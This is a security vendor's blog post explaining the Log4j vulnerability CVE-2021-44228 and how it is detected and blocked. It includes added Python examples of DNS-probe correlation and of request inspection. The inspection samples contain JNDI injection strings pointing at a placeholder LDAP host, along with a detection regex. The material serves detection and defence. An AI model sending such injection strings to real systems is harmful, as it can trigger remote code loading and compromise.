Log4j Vulnerability – Technical Details

Posted Date: April 12, 2022
Read Time: 3 min

In December 2021, the Log4j vulnerability, CVE-2021-44228, was publicly disclosed and was rapidly flagged as one of the most critical security vulnerabilities in recent years. This article discusses the vulnerability in depth: why it is critical and how Indusface detects and protects against it.

Log4j – The Zero-Day Vulnerability

Log4j is a logging library, part of the Apache Software Foundation’s Apache Logging Services project, that is pretty much ubiquitous in applications and services built using Java.

Applications regularly log many pieces of data continuously, often at every request/transaction, for various purposes like telemetry, analytics, enabling post facto diagnosis of issues, etc. With computing and storage becoming ever cheaper, logging has become more verbose over the years. A lot of the data logged comes from user requests which means an attacker can control what is logged. For example, web applications typically log the user-agent to categorize devices used to access the application.

It may seem strange that a vulnerability in a logging library can be this critical, even if attackers can control what is logged, since logs are generally understood to be simple string data. However, Log4j allows lookups that can be used to enhance the log messages. For example, information like environment variables, hardware, and locale can be added to the log message to aid developers in debugging issues. One of the lookups supported was JNDI (Java Naming and Directory Interface), which allows looking up and loading Java objects by name and, crucially, allowed loading and executing Java code from remote servers such as LDAP servers. An attacker could send a crafted string which, when logged, could execute arbitrary code in the context of the process that is writing the log.

Another reason this vulnerability is so insidious is that data flows through many systems, sometimes transformed and other times unchanged for processing as well as for analytics. In all these steps and systems, logs will be generated. This means that even if the system facing the internet is not vulnerable, other internal systems and 3rd party services that are used could also be vulnerable. Finding the attack surface and vulnerable systems is not straightforward.

How Does Indusface Detect This Vulnerability?

Dynamic testing for the vulnerability is not straightforward since logs may be generated and written at any time, so the checking must be out of band, i.e., a simple ‘send attack, check response’ will not suffice. Indusface uses a specially crafted JNDI attack vector containing a unique subdomain of a domain that we control. If a log using this vector is generated on a vulnerable system, Log4j will trigger a DNS lookup of that subdomain, and when we detect the DNS lookup, we know that the system is vulnerable. The Indusface WAS scanner will scan all areas of the application request, such as headers, query parameters, cookies, etc., and will provide all the attack details when the vulnerability triggers, pinpointing the exact page, parameter and attack. Since logs may not be generated immediately on the system, the vulnerability may be reported some time after the scan rather than immediately.

In one interesting case, we reported a vulnerable log4j system a week after the probe was sent. Even though the application is scanned daily, we always reported the alert only on a particular day of the week. On further investigation, we narrowed this down to a process that executes weekly to perform tasks like summarizing and auditing and that process was vulnerable to log4j.
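The correlation step described above, shown as an added example (not Indusface's code): each injection point gets its own subdomain label, and a DNS query seen later, even a week later, is mapped back to the page and parameter it was sent in. The zone name, the query-log line format and all function names are assumptions made for illustration.

```python
import re
import secrets
from datetime import datetime

OOB_ZONE = "oob.example.test"  # assumption: a DNS zone the scanner operator controls
# Hypothetical query-log line format: "<ISO timestamp> <resolver IP> <qname>"
LOG_LINE = re.compile(r"^(\S+)\s+(\S+)\s+(\S+)$")


class ProbeLedger:
    """Maps each unique subdomain label to the injection point it was sent in."""

    def __init__(self):
        self._probes = {}

    def issue(self, page, area, parameter, sent_at):
        # One random label per injection point, so a later DNS query identifies
        # exactly which page and parameter reached a vulnerable logger.
        token = secrets.token_hex(8)
        self._probes[token] = {"page": page, "area": area,
                               "parameter": parameter, "sent_at": sent_at}
        return f"{token}.{OOB_ZONE}"

    def resolve(self, qname):
        # Resolvers may change case or append a trailing dot; normalise both.
        name = qname.rstrip(".").lower()
        suffix = "." + OOB_ZONE
        if not name.endswith(suffix):
            return None
        return self._probes.get(name[: -len(suffix)].split(".")[-1])


def correlate(ledger, dns_log_lines):
    findings = []
    for line in dns_log_lines:
        m = LOG_LINE.match(line.strip())
        probe = ledger.resolve(m.group(3)) if m else None
        if probe is None:
            continue  # malformed line, unrelated query, or unknown label
        seen_at = datetime.fromisoformat(m.group(1))
        findings.append({**probe, "resolver": m.group(2),
                         "delay": seen_at - probe["sent_at"]})
    return findings


if __name__ == "__main__":
    ledger = ProbeLedger()
    host = ledger.issue("/login", "header", "User-Agent", datetime(2022, 3, 1, 10, 0))
    log = [f"2022-03-08T10:00:00 192.0.2.53 {host}."]  # constructed log line
    print(correlate(ledger, log))
```

Because the ledger keeps the send time, the reported delay shows when the vulnerable logging actually happened, which is how a weekly batch job like the one above stands out.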

Protection and Mitigation

Due to the nature of this vulnerability, successfully exploiting a vulnerable system is complicated, but the threat is serious and attacks are still going on. As can be seen in the chart below, attacks are being blocked by AppTrana every day, even months after the vulnerability was disclosed.

Figure 1: Attacks still occur regularly

The figure below categorizes the areas being targeted for possible Log4j vulnerabilities. Unsurprisingly, HTTP headers dominate since many headers will typically be logged by the application.

Figure 2: Split of areas being targeted (Headers dominate)
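A sketch of how requests can be inspected and tallied by targeted area, as in the figure above. This is an added example, not AppTrana's rule set; the request shape, field names and sample values are constructed for illustration.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Any "${name:" lookup in client-supplied data is unexpected; "jndi" is the
# lookup this article is about, so it is rated separately.
LOOKUP = re.compile(r"\$\{\s*([a-z]+)\s*:", re.IGNORECASE)


def decode(value, rounds=2):
    # Undo up to two layers of URL encoding before matching.
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def inspect_request(request):
    """Return one hit per field that contains a lookup expression."""
    hits = []
    for area in ("headers", "query", "cookies"):
        for name, raw in request.get(area, {}).items():
            kinds = {m.group(1).lower() for m in LOOKUP.finditer(decode(raw))}
            if kinds:
                severity = "high" if "jndi" in kinds else "review"
                hits.append({"area": area, "field": name, "severity": severity})
    return hits


def tally_by_area(requests):
    return Counter(hit["area"] for req in requests for hit in inspect_request(req))


# Constructed sample requests; placeholder.invalid is a non-resolvable name.
SAMPLE_REQUESTS = [
    {"headers": {"User-Agent": "${jndi:ldap://placeholder.invalid/x}"},
     "query": {"q": "shoes"}},
    {"headers": {"X-Api-Version":
                 "%24%7Bjndi%3Aldap%3A%2F%2Fplaceholder.invalid%2Fx%7D"}},
    {"query": {"name": "${env:HOME}"}, "cookies": {"sid": "abc123"}},
    {"headers": {"User-Agent": "Mozilla/5.0"}},
]

if __name__ == "__main__":
    print(tally_by_area(SAMPLE_REQUESTS))
```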

Indusface AppTrana has provided real-time protection and visibility for attacks targeting the Log4j vulnerabilities since December 2021. Additionally, Indusface recommends that all customers apply the mitigation steps to guard against this vulnerability.

Karthik Krishnamoorthy

Karthik Krishnamoorthy is a senior software professional with 28 years of experience in leadership and individual contributor roles in software development and security. He is currently the Chief Technology Officer at Indusface, where he is responsible for the company's technology strategy and product development. Previously, as Chief Architect, Karthik built the cutting-edge, intelligent Indusface web application scanning solution. Prior to joining Indusface, Karthik was a Datacenter Software Architect at McAfee (Intel Security), and a Storage Security Software Architect at Intel Corporation, in the endpoint storage security team developing security technology in the Windows kernel mode storage driver. Before that, Karthik was the Director of Deep Security Labs at Trend Micro, where he led the Vulnerability Research team for the Deep Security product line, a Host-Based Intrusion Prevention System (HIPS). Karthik started his career as a Senior Software Developer at various companies in Ottawa, Canada, including Cognos, Entrust, Bigwords and Corel. He holds a Master of Computer Science degree from Savitribai Phule Pune University and a Bachelor of Computer Science degree from Fergusson College. He also holds various certifications, such as in machine learning from Coursera, AWS, etc., from 2014.
